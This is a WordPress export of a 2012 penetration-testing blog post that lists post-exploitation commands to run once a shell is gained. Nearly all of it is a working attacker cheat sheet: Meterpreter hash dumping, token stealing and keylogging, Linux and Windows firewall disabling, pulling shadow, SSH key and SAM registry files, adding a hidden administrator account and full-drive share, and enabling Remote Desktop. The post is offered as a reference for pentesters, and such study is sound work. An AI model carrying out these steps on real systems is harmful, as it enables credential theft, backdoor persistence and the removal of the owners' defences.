{"id":398,"date":"2012-02-07T17:40:46","date_gmt":"2012-02-07T16:40:46","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=398"},"modified":"2012-02-24T21:51:24","modified_gmt":"2012-02-24T20:51:24","slug":"post-exploit-commands","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/02\/07\/post-exploit-commands\/","title":{"rendered":"Post Exploit Commands"},"content":{"rendered":"<p>Credit for most of the below comes from <a href=\"http:\/\/twitter.com\/#!\/mubix\" target=\"_blank\">Mubix<\/a>, who has created a few documents (on Google Docs) that list what to actually do once shell access has been gained. You can <a href=\"http:\/\/www.room362.com\/blog\/2011\/9\/6\/post-exploitation-command-lists.html\" target=\"_blank\">read more about it here<\/a> and find the links to the docs. I&#8217;m simply blogging about it to make a summary of it for myself.<\/p>\n<h3>Meterpreter Post Auth<\/h3>\n<p><em>Information Gathering<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/><\/div><\/td><td><div class=\"text codecolorer\">getuid<br \/>\ngetpid<br \/>\ngetprivs<br \/>\nsysinfo<br \/>\nscreenshot<br \/>\nrun winenum.rb<br \/>\nrun scraper.rb<br \/>\nrun checkvm<br \/>\nrun credcollect<br \/>\nrun get_local_subnets<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Escalating Privs<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">ps then migrate<br \/>\ngetsystem<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Tokens (use incognito)<\/em><\/p>\n<div class=\"codecolorer-container text
vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">list_tokens -u<br \/>\nimpersonate_token [DOMAIN\\user]<br \/>\nsteal_token [pid]<br \/>\nrev2self<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Retrieve Passwords<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">hashdump<br \/>\nrun post\/windows\/gather\/cachedump<br \/>\nrun post\/windows\/gather\/smart_hashdump<br \/>\nrun post\/windows\/gather\/credentials\/vnc<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Session<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">enumdesktops<br \/>\ngetdesktop<br \/>\nsetdesktop<br \/>\nuictl disable keyboard<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Keylog<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"text codecolorer\">keyscan_start<br \/>\nkeyscan_dump<br \/>\nkeyscan_stop<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h3>Nix Post Auth<\/h3>\n<p><em>Disable Firewall<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text
codecolorer\">\/etc\/init.d\/iptables save<br \/>\n\/etc\/init.d\/iptables stop<br \/>\niptables-save &gt; \/root\/firewall.rules<br \/>\niptables-restore &lt; \/root\/firewall.rules<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Files to pull<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/><\/div><\/td><td><div class=\"text codecolorer\">\/etc\/passwd<br \/>\n\/etc\/shadow OR \/etc\/security\/shadow (on AIX)<br \/>\n\/etc\/group OR \/etc\/gshadow<br \/>\n\/home\/*\/.ssh\/id*<br \/>\n\/etc\/sudoers<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>User Information<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"text codecolorer\">grep ^ssh \/home\/*\/.*hist*<br \/>\ngrep ^telnet \/home\/*\/.*hist*<br \/>\ngrep ^mysql \/home\/*\/.*hist*<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h3>Windows Post Auth<\/h3>\n<p><em>Get currently logged-in user<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">@echo %USERNAME%<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Add user<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">net user pentest password \/add<br \/>\nnet localgroup administrators pentest \/add<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Add share<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">net share nothing$=C:\\ \/grant:pentest,FULL \/unlimited<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Disable Firewall<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">netsh firewall set opmode disable<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Auto Start Directories<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/><\/div><\/td><td><div class=\"text codecolorer\">C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<br \/>\nC:\\Documents And Settings\\All Users\\Start Menu\\Programs\\StartUp\\<br \/>\nC:\\WINDOWS\\Start Menu\\Programs\\StartUp\\<br \/>\nC:\\WINNT\\Profiles\\All Users\\Start Menu\\Programs\\StartUp\\<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Accounts and Policies<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"text codecolorer\">net localgroup administrators OR net localgroup administrators \/domain<br \/>\nnet group &quot;Domain Admins&quot; \/domain<br \/>\nnet accounts OR net accounts \/domain<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Files to pull<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"text codecolorer\">%SYSTEMROOT%\\repair\\SAM<br \/>\n%SYSTEMROOT%\\System32\\config\\RegBack\\SAM<br \/>\n%WINDIR%\\repair\\sam OR system OR software OR security<br \/>\nreg save HKLM\\Security security.hive<br \/>\nreg save HKLM\\System system.hive<br \/>\nreg save HKLM\\SAM sam.hive<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><em>Enable Remote Desktop<\/em><\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">reg add &quot;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server&quot; \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Should you wish to have all this useful info (as well as an ASCII table) to hand, feel free to use the following wallpaper (1920&#215;1200).<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper-300x187.jpg\" alt=\"\" title=\"pentest_wallpaper\" width=\"300\" height=\"187\" class=\"aligncenter size-medium wp-image-394\" srcset=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper-300x187.jpg 300w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper-1024x640.jpg 1024w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/02\/pentest_wallpaper.jpg 1920w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nOr customize the <a
href=\"http:\/\/www.phillips321.co.uk\/downloads\/pentest_wallpaper.xcf.7z\">GIMP XCF file<\/a> yourself.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Credit for most of the below comes from Mubix who has created a few documents (on google docs) that lists what to actually do once shell access has been gained. You can read more about it here and find the links to the docs, I&#8217;m simply blogging about it to make a summary of this [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":394,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,64,4],"tags":[147,146,148,5,47,145,113],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/398"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=398"}],"version-history":[{"count":10,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/398\/revisions"}],"predecessor-version":[{"id":411,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/398\/revisions\/411"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/394"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}